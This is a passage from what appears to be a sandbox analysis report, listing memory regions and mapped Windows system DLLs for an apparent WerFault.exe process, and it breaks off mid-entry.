Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 544 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 545 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 546 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 547 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 548 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 549 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 550 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 551 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 552 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 553 start_va = 0xab0000 end_va = 0xaf2fff monitored = 0 entry_point = 0xad0f50 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 554 start_va = 0xb00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 555 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 556 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 557 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 558 start_va = 0x7fff0000 end_va = 0x7dfc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 559 start_va = 0x7dfc5f810000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc5f810000" filename = "" Region: id = 560 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 561 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 563 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 564 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 565 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 566 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 567 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 571 start_va = 0x5a0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 572 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 573 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 574 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 575 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 576 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 577 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 579 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 580 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 581 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 582 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 583 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 584 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 585 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 586 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 587 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 588 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 589 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 590 start_va = 0x6c400000 end_va = 0x6c486fff monitored = 0 entry_point = 0x6c46dbc0 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 591 start_va = 0x6c200000 end_va = 0x6c33efff monitored = 0 entry_point = 0x6c22d880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 593 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 594 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 595 start_va = 0x72070000 end_va = 0x72091fff monitored = 0 entry_point = 0x720791f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 600 start_va = 0x6c1d0000 end_va = 0x6c1f0fff monitored = 0 entry_point = 0x6c1ea910 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 601 start_va = 0x6c3a0000 end_va = 0x6c3f3fff monitored = 0 entry_point = 0x6c3d10d0 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 602 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 603 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 604 start_va = 0x5a0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 605 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 606 start_va = 0x810000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 609 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 616 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 617 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 618 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 619 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 620 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 621 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 626 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 627 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 628 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 629 start_va = 0x500000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 630 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 631 start_va = 0x4b00000 end_va = 0x4c80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 632 start_va = 0x4c90000 end_va = 0x608ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c90000" filename = "" Region: id = 633 start_va = 0x70040000 end_va = 0x700b4fff monitored = 0 entry_point = 0x70079a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 635 start_va = 0x6090000 end_va = 0x61effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006090000" filename = "" Region: id = 644 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 645 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 646 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 647 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 648 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 649 start_va = 0x61f0000 end_va = 0x69effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000061f0000" filename = "" Region: id = 650 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 654 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 655 start_va = 0x580000 end_va = 0x586fff monitored = 0 entry_point = 0x582820 region_type = mapped_file name = "secinit.exe" filename = "\\Windows\\SysWOW64\\secinit.exe" (normalized: "c:\\windows\\syswow64\\secinit.exe") Region: id = 656 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "secinit.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\secinit.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\secinit.exe.mui") Region: id = 657 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 658 start_va = 0x580000 end_va = 0x586fff monitored = 0 entry_point = 0x582820 region_type = mapped_file name = "secinit.exe" filename = "\\Windows\\SysWOW64\\secinit.exe" (normalized: "c:\\windows\\syswow64\\secinit.exe") Region: id = 659 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "secinit.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\secinit.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\secinit.exe.mui") Region: id = 660 start_va = 0x61f0000 end_va = 0x6526fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 661 start_va = 0x580000 end_va = 0x586fff monitored = 0 entry_point = 0x582820 region_type = mapped_file name = "secinit.exe" filename = "\\Windows\\SysWOW64\\secinit.exe" (normalized: "c:\\windows\\syswow64\\secinit.exe") Region: id = 662 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "secinit.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\secinit.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\secinit.exe.mui") Region: id = 663 start_va = 0x580000 end_va = 0x586fff monitored = 0 entry_point = 0x582820 region_type = mapped_file name = "secinit.exe" filename = "\\Windows\\SysWOW64\\secinit.exe" (normalized: "c:\\windows\\syswow64\\secinit.exe") Region: id = 664 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "secinit.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\secinit.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\secinit.exe.mui") Region: id = 665 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 666 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 667 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 668 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 669 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 670 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 671 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 672 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 673 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 674 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 675 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 676 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 677 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 678 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 679 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 680 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 681 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 682 start_va = 0x580000 end_va = 0x584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 690 start_va = 0x580000 end_va = 0x581fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 691 start_va = 0x620000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 692 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 702 start_va = 0x6bdb0000 end_va = 0x6c1cdfff monitored = 0 entry_point = 0x6beaee80 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 703 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 704 start_va = 0x6bd40000 end_va = 0x6bdaffff monitored = 0 entry_point = 0x6bd94b90 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 705 start_va = 0x6cd40000 end_va = 0x6cd6cfff monitored = 0 entry_point = 0x6cd52b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 706 start_va = 0x6090000 end_va = 0x6179fff monitored = 0 entry_point = 0x60cd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 707 start_va = 0x61e0000 end_va = 0x61effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 708 start_va = 0x6cdb0000 end_va = 0x6cdb9fff monitored = 0 entry_point = 0x6cdb3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 709 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 710 start_va = 0x6cd30000 end_va = 0x6cd37fff monitored = 0 entry_point = 0x6cd317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 711 start_va = 0x6090000 end_va = 0x618ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006090000" filename = "" Region: id = 712 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 713 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 714 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 715 start_va = 0x5a0000 end_va = 0x5a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 716 start_va = 0x5a0000 end_va = 0x5a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 717 start_va = 0x6530000 end_va = 0x662ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006530000" filename = "" Region: id = 718 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 719 start_va = 0x5a0000 end_va = 0x5abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 720 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 721 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 722 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 723 start_va = 0x5a0000 end_va = 0x5b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 724 start_va = 0x5a0000 end_va = 0x5b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 725 start_va = 0x5a0000 end_va = 0x5b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 726 start_va = 0x5a0000 end_va = 0x5b9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 727 start_va = 0x5a0000 end_va = 0x5bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 728 start_va = 0x5a0000 end_va = 0x5bdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 729 start_va = 0x5a0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 730 start_va = 0x6630000 end_va = 0x670ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 731 start_va = 0x9e0000 end_va = 0xaa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 732 start_va = 0x6710000 end_va = 0x67b9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006710000" filename = "" Region: id = 733 start_va = 0x67c0000 end_va = 0x6867fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067c0000" filename = "" Region: id = 734 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 735 start_va = 0x5b0000 end_va = 0x5b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wer.dll.mui") Region: id = 736 start_va = 0x5c0000 end_va = 0x5c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 737 start_va = 0x6710000 end_va = 0x6f0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006710000" filename = "" Region: id = 738 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 739 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 740 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 741 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 742 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 743 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 744 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 745 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 746 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 747 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 748 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 749 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 750 start_va = 0x6710000 end_va = 0x680ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006710000" filename = "" Region: id = 751 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 770 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 1 entry_point = 0x0 region_type = 